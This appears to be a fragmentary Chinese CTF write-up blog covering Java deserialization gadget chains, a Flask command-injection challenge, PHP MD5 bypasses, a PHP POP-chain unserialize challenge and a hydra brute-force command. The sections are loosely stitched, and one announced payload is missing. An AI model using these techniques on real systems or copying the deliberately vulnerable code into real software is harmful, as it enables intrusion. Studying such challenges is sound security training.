Luc1f3r's Blog
共同条件 继承Serializable
入口类 source(重写readObject 调用常见的函数 参数类型宽泛 最好jdk自带)
调用链 gadget chain 相同名称 相同类型
执行类 sink (rce ssrf 写文件等等)最重要!!!
可能形式:
1、入口类的 readObject 直接调用危险方法。
2、入口类参数中包含可控类,该类里面有危险方法,readObject 时调用。
3、入口类参数中包含可控类,该类又调用有其他有危险方法的类,readObject 时调用。
User-agent: *
Disallow: /s3recttt
app.py。import os
import flask
from flask import Flask, request, send_from_directory, send_file
app = Flask(__name__)
@app.route('/api')
def api():
cmd = request.args.get('SSHCTFF', 'ls /')
result = os.popen(cmd).read()
return result
@app.route('/robots.txt')
def static_from_root():
return send_from_directory(app.static_folder,'robots.txt')
@app.route('/s3recttt')
def get_source():
file_path = "app.py"
return send_file(file_path, as_attachment=True)
if __name__ == '__main__':
app.run(debug=True)
/api 路径去用 GET 通过变量 SSHCTFF 传递需要执行的命令,即可获取 flag。<?php
highlight_file(__file__);
$master = "MD5 master!";
if(isset($_POST["master1"]) && isset($_POST["master2"])){
if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
echo $master . "<br>";
echo file_get_contents('/flag');
}
}
else{
die("master? <br>");
}
?>
<?php
function readmyfile($path){
$fh = fopen($path, "rb");
$data = fread($fh, filesize($path));
fclose($fh);
return $data;
}
echo '⼆进制md5加密:'.md5( (readmyfile("1_msg1.txt")));
echo 'url编码:'.urlencode(readmyfile("1_msg1.txt"));
echo '⼆进制md5加密:'.md5( (readmyfile("1_msg2.txt")));
echo 'url编码:'. urlencode(readmyfile("1_msg2.txt"));
?>
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class ShellExecutor {
public static void main(String[] args) {
try {
// 定义要执行的shell命令
String command = "cat /flag";
// 使用 Runtime.exec() 方法执行命令
Process process = Runtime.getRuntime().exec(command);
// 获取命令的输出流
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
// 读取输出流中的每一行并打印
String line;
while ((line = reader.readLine()) != null) {
System.out.println(line);
}
// 关闭流
reader.close();
// 等待命令执行完成
int exitCode = process.waitFor();
System.out.println("Command execution completed with exit code: " + exitCode);
} catch (Exception e) {
e.printStackTrace();
}
}
}
<?php
class SH {
public static $Web = false;
public static $SHCTF = false;
}
class C {
public $p;
public function flag()
{
($this->p)();
}
}
class T{
public $n;
public function __destruct()
{
SH::$Web = true;
echo $this->n;
}
}
class F {
public $o;
public function __toString()
{
SH::$SHCTF = true;
$this->o->flag();
return "其实。。。。,";
}
}
class SHCTF {
public $isyou;
public $flag;
public function __invoke()
{
if (SH::$Web) {
($this->isyou)($this->flag);
echo "小丑竟是我自己呜呜呜~";
} else {
echo "小丑别看了!";
}
}
}
if (isset($_GET['data'])) {
highlight_file(__FILE__);
unserialize(base64_decode($_GET['data']));
}
else {
highlight_file(__FILE__);
echo "小丑离我远点!!!";
}
?>
__destruct 方法,在该方法中,最后存在 echo 即可以回显由 __toString 转化的特定内容的字符串。F 类中的 o 想要调用 flag 函数,所以要将含有 flag 函数的 C 类传给 o。flag 函数中调用 SHCTF 类中的 __invoke 魔术方法。Payload 如下:
<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
if (isset($_GET['name']) && isset($_POST['password']) && isset($_GET['name2']) && isset($_POST['password2']) {
$name = $_GET['name'];
$name2 = $_GET['name2'];
$password = $_POST['password'];
$password2 = $_POST['password2'];
if ($name != $password && md5($name) == md5($password)){
if ($name2 !== $password2 && md5($name2) === md5($password2)){
echo $flag;
}
else {
echo "再看看啊,马上绕过嘞!";
}
}
else {
echo "错啦错啦";
}
}
else {
echo '没看到参数呐';
}
?>
本题考察了对 md5 加密的绕过,而 md5 绕过大体上有 3 种绕过的方法,对应不同的情况使用。
$E=mc^2$
hydra -L user_name.txt -P dir.txt http-get://xxx/flag.html,经过比对之后即得 Flag。